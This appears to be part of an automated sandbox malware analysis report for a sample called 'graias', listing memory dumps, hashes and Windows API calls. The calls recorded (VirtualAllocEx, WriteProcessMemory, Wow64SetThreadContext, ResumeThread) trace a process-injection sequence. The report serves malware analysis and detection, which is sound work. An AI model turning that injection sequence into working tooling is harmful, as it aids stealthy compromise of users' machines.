                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1713673829.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_eb0000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                            • Opcode ID: 74f191bf364d134e976f756c583ae0e16aa8d5ea78c0b481348b3ae9bb90769a
                                                                                                                                                                                                                                            • Instruction ID: a8f7f836d8703a36ca744ad08f229ead5e2f6b90229b3a4e929f439773b9cfd2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74f191bf364d134e976f756c583ae0e16aa8d5ea78c0b481348b3ae9bb90769a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4541DFB1C00719CBDB24CFAAC984BDEBBB5BF88304F20856AD408BB251DB756945CF90
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732113047.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d20000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                                                                                                                            • Opcode ID: 31d98be7d9c3d7eea63325f5ddb9a6bfda583f8ad0dd7bcce6dccf51ed62f03c
                                                                                                                                                                                                                                            • Instruction ID: f01c9bf892dee4a80aa6c05ceb11945d7f6438d820dbccb3a7c982cf2251c0cd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d98be7d9c3d7eea63325f5ddb9a6bfda583f8ad0dd7bcce6dccf51ed62f03c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17319A728043999FCB11CFA9C800ADEBFF9EF09320F14805AF954A7261C7399950DFA1
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E05DC8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                                                                                            • Opcode ID: fb2173397ebbecaeaef2c38b02c4edcd321c4f233f4a30412f574f9ae874aae2
                                                                                                                                                                                                                                            • Instruction ID: f018543c8649a793a56295e70f1d15f777bc984622468ef1019c41b508ee0b24
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb2173397ebbecaeaef2c38b02c4edcd321c4f233f4a30412f574f9ae874aae2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 102134B19003599FDB10CFA9C985BDEBBF5FF48320F14842AE958A7280C7789941CF60
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 02917917
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1716776800.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2910000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                                                            • Opcode ID: c0ca3a02228219b7b85abcc19a0a02813a7cee7066f675596fe62dd1395a08a2
                                                                                                                                                                                                                                            • Instruction ID: 871fd2e81734645657778af909553f0101c13590bb874c9e1578c7d3456c8cf1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0ca3a02228219b7b85abcc19a0a02813a7cee7066f675596fe62dd1395a08a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9831E2B5D0024A9FCB10CF9AD884AEEFBF5EF48324F24842AE419A7210D774A545CFA0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 02917917
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1716776800.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2910000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                                                            • Opcode ID: dad43f5e1d09c533ba2f23b2edf878696fe44cb840deabd53068bfc040299d2d
                                                                                                                                                                                                                                            • Instruction ID: c96d904ef4fa9fb5cc3289c704be09f6f1c75a72ad22ae5bb81a68ec2a462fcf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dad43f5e1d09c533ba2f23b2edf878696fe44cb840deabd53068bfc040299d2d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D521C3B5D0024A9FDB10CF9AD984ADEFBF9FB48324F14842AE519A7210D774A544CFA0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E05DC8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                                                                                            • Opcode ID: bca0e04154e9304895310eb7378c555296da26d9ed3af0ddfcb2ff4bf247304f
                                                                                                                                                                                                                                            • Instruction ID: c54a3a65d4cf86a62c6e00d0bffc8603c51d3b53ec449a92b15d8be437452512
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bca0e04154e9304895310eb7378c555296da26d9ed3af0ddfcb2ff4bf247304f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF2127B19003099FDB10CFA9C985BDEBBF5FF48324F10842AE918A7240D7789940DFA0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E05EA8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                                                                                            • Opcode ID: cbeac24dd2211177f5452c288db37f7ded004fbbaf6bea43fa299994eff5e968
                                                                                                                                                                                                                                            • Instruction ID: d5b706789ce16353fdb455202fc8c9e524602ebb3a7d5f178ff9429f2842cc60
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbeac24dd2211177f5452c288db37f7ded004fbbaf6bea43fa299994eff5e968
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 742125B1800309DFDB10CFAAC885AEEFBF5FF48320F10842AE958A7240D7789541DBA0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E05C1E
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: d1f76f0b3f81d752577ace648f5c8b4bc3ca1b7734b3556c41760847803c823b
• Instruction ID: ad66d8be0faa4bf68fc3f023ec58c73295d22ace6fbe3bb8aca50fa08f684375
• Opcode Fuzzy Hash: d1f76f0b3f81d752577ace648f5c8b4bc3ca1b7734b3556c41760847803c823b
• Instruction Fuzzy Hash: C72139B1D003099FDB10DFAAC585BEEBBF4EF58324F14842AD459AB240DB789945CFA1
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00EBE28E,?,?,?,?,?), ref: 00EBE34F
Memory Dump Source
• Source File: 00000006.00000002.1713673829.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_eb0000_graias.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 2a2e7b7d4d8517fea0e914fdb8104ed99c16e3ea7d641d91d9c42c277e763886
• Instruction ID: b4950059d2e9ba77162b3345346e8ef99c530592468a82d3b1a8a909c034825d
• Opcode Fuzzy Hash: 2a2e7b7d4d8517fea0e914fdb8104ed99c16e3ea7d641d91d9c42c277e763886
• Instruction Fuzzy Hash: 7A21E5B5900249AFDB10CF9AD585ADEBBF9FB48320F14841AE914A7350D374A940CFA0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E05EA8
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 2d255ff2dd6066d9a9a0f6a0cff5e8ae3770cc9f18e71a9db5a41afa1d23583e
• Instruction ID: f5894c22b5a77eb7fceced37d4a4fd8be94256fcd39d16b221394684cedb6fe9
• Opcode Fuzzy Hash: 2d255ff2dd6066d9a9a0f6a0cff5e8ae3770cc9f18e71a9db5a41afa1d23583e
• Instruction Fuzzy Hash: 402128B1C003499FDB10CFAAC985ADEFBF5FF48320F10842AE518A7240D7799541DBA1
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E05C1E
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 1bbd32e1d9b99349ac6df9835e5a97c2c8f29ddefe4a6d5595e2c5b888d8ecea
• Instruction ID: 22809ccd02e330a393445abecd3b9d3497fb7d11e6af4494c28294f1bcf08d32
• Opcode Fuzzy Hash: 1bbd32e1d9b99349ac6df9835e5a97c2c8f29ddefe4a6d5595e2c5b888d8ecea
• Instruction Fuzzy Hash: 60214CB1D003098FDB10DFAAC5857EEBBF4EF48324F14842AD419A7240DB789545CFA1
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E05CE6
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 8f14a2490a1faaeb145ea020fe32bbb88e9933ad6a0182b9a1cdd00ccf9d4143
• Instruction ID: 4086df8f850b39447b3ddb388d28ebf6578942580bb268e779ede9247053b393
• Opcode Fuzzy Hash: 8f14a2490a1faaeb145ea020fe32bbb88e9933ad6a0182b9a1cdd00ccf9d4143
• Instruction Fuzzy Hash: 07216AB19003499BDB20CFAAC845BDEBFF5EF48320F248419E959A7250CB75A540CFA0
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06D23312,?,?,?,?,?), ref: 06D233B7
Memory Dump Source
• Source File: 00000006.00000002.1732113047.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d20000_graias.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: 1a51baf5d1cecf592a1f243edf10e1c8c94b05453b4cc0e24f3db6fa7050c224
• Instruction ID: 83e34300f9141324ab795c7f65e3940c27cfd854ddfc1402b68fa10a2588a0df
• Opcode Fuzzy Hash: 1a51baf5d1cecf592a1f243edf10e1c8c94b05453b4cc0e24f3db6fa7050c224
• Instruction Fuzzy Hash: FD1137B580035ADFDB10CF9AC844BDEBFF8EB58324F14841AE514A7210C779A954DFA4
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E05CE6
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 5e4804009a815151a03dc82faf2796481d2bf4bf453a84a799ca2b00776269cf
• Instruction ID: 2530b7c951f9d9be57b8b6bde4034f008b2f8e51e74e5074e13d1f63c19c9580
• Opcode Fuzzy Hash: 5e4804009a815151a03dc82faf2796481d2bf4bf453a84a799ca2b00776269cf
• Instruction Fuzzy Hash: 78116AB19003099FDB10DFAAC845BDEBFF5EF48320F248419E519A7250CB759540CFA0
APIs
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 27bf93a739bf9257a8cfcc39d0564219a25a1e26518b50beb4220ba702435980
• Instruction ID: 822bc06be209f37206f98ab962d98f3204cf8637bcddf1065995fdb3da3edc6e
• Opcode Fuzzy Hash: 27bf93a739bf9257a8cfcc39d0564219a25a1e26518b50beb4220ba702435980
• Instruction Fuzzy Hash: 061119B5D003498ADB20DFAAC845BDEFFF9EB98324F248419D519A7240CA756940CFA5
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06E098AD
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: b6f3c9034d261e481f7f90296e6263edfb34d80772902a29f144564fdff163a1
• Instruction ID: e27b1480c7fa7f01577a7a8b14d96063d0f71bbba0515cf901da34c17d497d9b
• Opcode Fuzzy Hash: b6f3c9034d261e481f7f90296e6263edfb34d80772902a29f144564fdff163a1
• Instruction Fuzzy Hash: EE1113B5800309DEDB20CF99D845BDEBBF8FB48324F20941AE958A7741D375A584CFA1
APIs
Memory Dump Source
• Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                                                                                            • Opcode ID: 76ee27e85230686b930cd5fd322f62e6d0d4f024008a0566315dee8ebe4466d8
                                                                                                                                                                                                                                            • Instruction ID: fc48865a418b7747fd615a0dce143134962ebce9e0e4e0aa174f7cc41aefb438
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76ee27e85230686b930cd5fd322f62e6d0d4f024008a0566315dee8ebe4466d8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 941128B1D003498BDB20DFAAC44579EFBF9EB88324F248419D519A7240CB796940CF95
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E098AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                                                            • Opcode ID: 17909c5e155a84c5049fa2f962c1e683d1180be1bf287078b024271e9ed1cfed
                                                                                                                                                                                                                                            • Instruction ID: f5c2c1512c61532b37eb1d88af60d4772a98d175384911de0baa1590f722b4c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17909c5e155a84c5049fa2f962c1e683d1180be1bf287078b024271e9ed1cfed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F81106B5800349DFDB10DF99C845BDEBBF8EB48320F24941AE518A7341D375A944CFA5
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00EBC046
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1713673829.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_eb0000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                            • Opcode ID: ef6daa60f771b4c69b83891cc7892b4b381c091b2fd7fa6430fff6a49ed6d8bf
                                                                                                                                                                                                                                            • Instruction ID: 5e06a6ce4511027e6fb96d9676c06de397ed13a1cc9013c979187da72a526cea
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef6daa60f771b4c69b83891cc7892b4b381c091b2fd7fa6430fff6a49ed6d8bf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5211DFB6C04249CFCB20DF9AD444ADEFBF5EB88324F24851AD419B7610D379A945CFA1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Hhq
                                                                                                                                                                                                                                            • API String ID: 0-4210879014
                                                                                                                                                                                                                                            • Opcode ID: 359d46864475b4f5d290e352daa1120634656b6ab087efa2e875ce3677499b54
                                                                                                                                                                                                                                            • Instruction ID: 40a91a9bf39db8fab0305f286b087f90517cd6afe57e4d4a892e73343af6ad29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 359d46864475b4f5d290e352daa1120634656b6ab087efa2e875ce3677499b54
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9751E37AB045118FE7589B2DD884B79B7E2FF85220B14866AE119CB3E0DB30EC42C790
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3f0a09e1d56f7966c93d286ee93f30d5b9936938b4abfa2bbb55a1cf63dcb6f4
                                                                                                                                                                                                                                            • Instruction ID: c6c16e4c03d3be70253bdc1c923e2b1649e4e2e7cb1e7ab72cf31960b20b47a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0a09e1d56f7966c93d286ee93f30d5b9936938b4abfa2bbb55a1cf63dcb6f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5D16330A007058FE768DF38C894B6A77B6FF89321F54496AE1629B3E1DB36D845CB50
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 055af0c8346e496f9f7c217f4b95c5998b77cfcf40d33cfd579e42a96a31ac8f
                                                                                                                                                                                                                                            • Instruction ID: e6a2f21fecfbb2dfbe8bb130b3e1d5aebfe62611da066dd8098dee48c381c0f4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 055af0c8346e496f9f7c217f4b95c5998b77cfcf40d33cfd579e42a96a31ac8f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D1C634A00609CFEB54CF58C588FA9B7F2FF84315F6685A9E4459B2A1CB31ED86CB50
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9352e9413aaab5b261c17ce2d90d11b666258c2e1e6c8b55ede9b32a9d70a9c1
                                                                                                                                                                                                                                            • Instruction ID: 52d1979de36af4507036888b8b985e6bf31ddf94ebeeb8a81b44f8539dd37f6c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9352e9413aaab5b261c17ce2d90d11b666258c2e1e6c8b55ede9b32a9d70a9c1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BA1C734A00204DFEB54DF68D888FA977B1FF49315F5591A8E4459F2A2CB30E885CB50
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a5bbfeffa9e7c29033bd323234c87f92048af0d9c3c1b9ef66874e874e05dc53
                                                                                                                                                                                                                                            • Instruction ID: ef356fadaf359aeb6acbd677c45dd25a512179b8ef3438a5b4013512d4e8ec1f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5bbfeffa9e7c29033bd323234c87f92048af0d9c3c1b9ef66874e874e05dc53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36618670E04209CFEB64DFA9C4447AEBBF6AF89300F249469D859E7391D734D941CBA0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ddbabfcc4163d858daa8fbd6aa6594c98233e388241450d5566741669afa25c8
                                                                                                                                                                                                                                            • Instruction ID: 91fc35741aaf0155e84dd8de4817d35b9b3c9250063e970a56a559f15e85ee68
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddbabfcc4163d858daa8fbd6aa6594c98233e388241450d5566741669afa25c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01314A75B002149FDB54DF68C884E6E7BB6FF48720F2042AAE5259B2B1C771DD41CB90
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 02824529776b742e7746bc631b9e81d36cc46ff2f79ebe370901bb9b53e5246a
                                                                                                                                                                                                                                            • Instruction ID: 97ee45db32cf1c90f2edef9f1ae6140ac1e3a83009975c3cc155a52548e160f3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02824529776b742e7746bc631b9e81d36cc46ff2f79ebe370901bb9b53e5246a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38312839B09380CFD716EB2998509AA7FF29F8621078D40EAD545CF2A3EA34CC45C791
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8cfe579eabb7d37858c2e7f14961c8385289fc57794ea9f33ccb471db3d71dcc
                                                                                                                                                                                                                                            • Instruction ID: 98b244d0724cdc711746279ccd41dbabcef8ad49a318de3e8c16a84ecd5a1d19
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cfe579eabb7d37858c2e7f14961c8385289fc57794ea9f33ccb471db3d71dcc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3441F475E00219CFDB44DFA8D884BADB7B1FF48310F2085A6D555AB2A1DB34A941CBA0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f0eb7b3f603d308815ba53d735833a1d15ca45837cdf630d5fdb1b54fcf362fd
                                                                                                                                                                                                                                            • Instruction ID: 258d3791d35bce5f1c615e60a76b5df709b43cd6d7a23a0016d7a40bdc104db0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0eb7b3f603d308815ba53d735833a1d15ca45837cdf630d5fdb1b54fcf362fd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31315E35B016008FD755DF68D498999BBF1EF8D320B1A84AAD455AB3A2CB30EC45CF61
                                                                                                                                                                                                                                            Memory Dump Source
